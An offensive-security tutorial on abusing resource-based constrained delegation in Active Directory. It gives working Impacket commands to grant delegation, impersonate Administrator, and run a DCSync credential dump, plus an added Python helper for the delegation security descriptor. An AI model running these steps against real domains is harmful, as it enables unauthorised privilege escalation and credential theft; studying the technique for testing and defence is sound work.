👾 Overview

TLDR: GenericWrite over a machine account, combined with any account that has an SPN (a machine account you create yourself will do), lets you impersonate other users against services on that machine.

Resource Based Constrained Delegation (RBCD) is very similar to traditional constrained delegation, but with one key difference: the delegation is configured on the target (back-end) machine's own account rather than on the front-end account, so whoever can write to the target's object controls it, and no SeEnableDelegationPrivilege on the front-end is needed.

Users with GenericWrite over a machine account are able to set the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of that machine. The attribute is a security descriptor whose DACL lists the accounts that are allowed to delegate to, i.e. impersonate other users against, the machine. The impersonating account needs an SPN, because the S4U2Self request that starts the chain only works for accounts that have one, so you'll need to either compromise an account with an SPN or create a machine account (which gets SPNs automatically).

🔍 Discovery

Requirements:

  • An account with an SPN - or the ability to create a machine account, which depends on ms-DS-MachineAccountQuota (10 by default), more on checking the MAQ here
  • GenericWrite over a machine account (GenericAll or WriteProperty on msDS-AllowedToActOnBehalfOfOtherIdentity also works) - find this with BloodHound

📌 Exploitation

Here’s a general run through of the steps we’ll need to take:

  1. Create a machine account (or compromise an account with an SPN)
  2. Write the msDS-AllowedToActOnBehalfOfOtherIdentity attribute on the target machine account so that it trusts your account for delegation
  3. Perform an S4U attack (S4U2Self followed by S4U2Proxy) as your account - requesting a service ticket to the target system/service for the user you want to impersonate
  4. Pass the ticket to authenticate as the impersonated user against the target system

After creating a machine account (impacket-addcomputer can do this), you'll need to actually configure the RBCD on the target. Note that 'write' appends your account to whatever is already in the attribute; use -action 'read' first to see what's there, and -action 'remove' (or 'flush') to clean up when you're done.

# Using Impacket
impacket-rbcd -delegate-from '[Your machine account or account with an SPN]' -delegate-to '[Target machine account]' -action 'write' '[domain]/[user]:[password]'
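To make it concrete what that 'write' actually puts on the target object, here is an added example (not part of the original page or of Impacket) that builds and parses the msDS-AllowedToActOnBehalfOfOtherIdentity security descriptor by hand. It uses the same field values impacket-rbcd writes (self-relative SD with a DACL, ACL revision 4, one ACCESS_ALLOWED_ACE with mask 0xF01FF per delegating account, BUILTIN\Administrators as owner and group). The SIDs are constructed placeholders; the helper names (build_rbcd_sd, parse_rbcd_sd, add_delegate, can_act_on_behalf) are this example's own. The parser is what you would point at the raw attribute value pulled from LDAP when auditing which accounts a machine already trusts.

```python
import struct

# Security descriptor / ACL constants from MS-DTYP.
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACL_REVISION_DS = 0x04
ACCESS_ALLOWED_ACE_TYPE = 0x00
# Access mask impacket-rbcd grants to each delegating account (all standard + DS rights).
RBCD_ACE_MASK = 0x000F01FF
# Owner/group impacket-rbcd stamps on the descriptor: BUILTIN\Administrators.
BUILTIN_ADMINS = "S-1-5-32-544"


def sid_to_bytes(sid):
    """Encode a textual SID (S-1-5-21-...) into its binary form."""
    parts = sid.split("-")
    if parts[0] != "S" or parts[1] != "1":
        raise ValueError("bad SID: %s" % sid)
    authority = int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", 1, len(subs))
            + authority.to_bytes(6, "big")             # identifier authority is big-endian
            + b"".join(struct.pack("<I", s) for s in subs))


def bytes_to_sid(buf, off=0):
    """Decode a binary SID at buf[off]; returns (text, length_in_bytes)."""
    rev, count = struct.unpack_from("<BB", buf, off)
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d" % (rev, authority) + "".join("-%d" % s for s in subs), 8 + 4 * count


def build_rbcd_sd(delegate_from_sids):
    """Build the self-relative SD that the target's attribute holds.

    Layout: 20-byte header, owner SID, group SID, then the DACL with one
    ACCESS_ALLOWED_ACE per account allowed to delegate to the machine."""
    owner = sid_to_bytes(BUILTIN_ADMINS)
    group = sid_to_bytes(BUILTIN_ADMINS)
    aces = b""
    for sid in delegate_from_sids:
        sid_bytes = sid_to_bytes(sid)
        # ACE header: type, flags, size (header + mask + sid), access mask
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0,
                            8 + len(sid_bytes), RBCD_ACE_MASK) + sid_bytes
    # ACL header: revision, sbz1, size, ace count, sbz2
    dacl = struct.pack("<BBHHH", ACL_REVISION_DS, 0, 8 + len(aces),
                       len(delegate_from_sids), 0) + aces
    off_owner = 20
    off_group = off_owner + len(owner)
    off_dacl = off_group + len(group)
    # SD header: revision, sbz1, control, owner/group/sacl/dacl offsets (no SACL)
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         off_owner, off_group, 0, off_dacl)
    return header + owner + group + dacl


def parse_rbcd_sd(blob):
    """Return [(sid, mask), ...] for every ACCESS_ALLOWED_ACE in the DACL."""
    _, _, control, _, _, _, off_dacl = struct.unpack_from("<BBHIIII", blob, 0)
    if not control & SE_DACL_PRESENT or off_dacl == 0:
        return []                      # attribute present but no DACL: nobody may delegate
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", blob, off_dacl)
    entries = []
    pos = off_dacl + 8
    for _ in range(ace_count):
        ace_type, _, ace_size, mask = struct.unpack_from("<BBHI", blob, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sid, _ = bytes_to_sid(blob, pos + 8)
            entries.append((sid, mask))
        pos += ace_size                # skip any ACE type we don't interpret
    return entries


def can_act_on_behalf(blob, sid):
    """True if the account with this SID may delegate to the machine."""
    return any(s == sid for s, _ in parse_rbcd_sd(blob))


def add_delegate(existing_blob, new_sid):
    """Append a SID while preserving existing entries, as 'write' does."""
    sids = [s for s, _ in parse_rbcd_sd(existing_blob)] if existing_blob else []
    if new_sid not in sids:
        sids.append(new_sid)
    return build_rbcd_sd(sids)


if __name__ == "__main__":
    # Constructed SID for a machine account the attacker created (ATTACKER$).
    attacker = "S-1-5-21-1111111111-2222222222-3333333333-1105"
    sd = build_rbcd_sd([attacker])
    print("descriptor length:", len(sd))
    print("allowed to act on behalf:", parse_rbcd_sd(sd))
```

Running it prints a 96-byte descriptor with a single ACE for the attacker SID; feeding the raw attribute value from an LDAP search into parse_rbcd_sd shows whether a machine already trusts some other account, which is worth knowing before you overwrite or remove anything.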

Next, you'll need to request a service ticket to the target as the account you want to impersonate, usually the Administrator. This is the S4U2Self + S4U2Proxy step, performed with your SPN-bearing account's credentials. It will fail for users that are marked "Account is sensitive and cannot be delegated" or are members of Protected Users, so pick a target user accordingly.

# Using Impacket
impacket-getST -spn 'cifs/[Target machine]' -impersonate 'Administrator' '[Domain]/[Your machine account or account with an SPN]:[Password]' -dc-ip [IP]

getST saves the resulting ticket as a .ccache file in the current directory. At this point you can pass the ticket (export KRB5CCNAME to point at it and use the -k flag) to authenticate as the impersonated user against whatever service you'd like on the target system; the SPN in the ticket (cifs/ above) determines which service it is valid for.

✨ Post-Exploitation

If the target machine is a domain controller, you'll likely want to pass the ticket to perform a DCSync Attack. If it's an ordinary host, the ticket instead gives you the impersonated user's access to that host only (e.g. impacket-psexec or impacket-secretsdump against its local SAM), since it is a service ticket for that machine, not a TGT.

export KRB5CCNAME=[path to the .ccache getST wrote]
impacket-secretsdump -k -no-pass '[domain]/Administrator@[target DC FQDN]' -just-dc-user Administrator

📝 Resources

🔗 Hyperlink | ℹ️ Info
RedXORBlue | Constrained, unconstrained, and resource based delegation writeup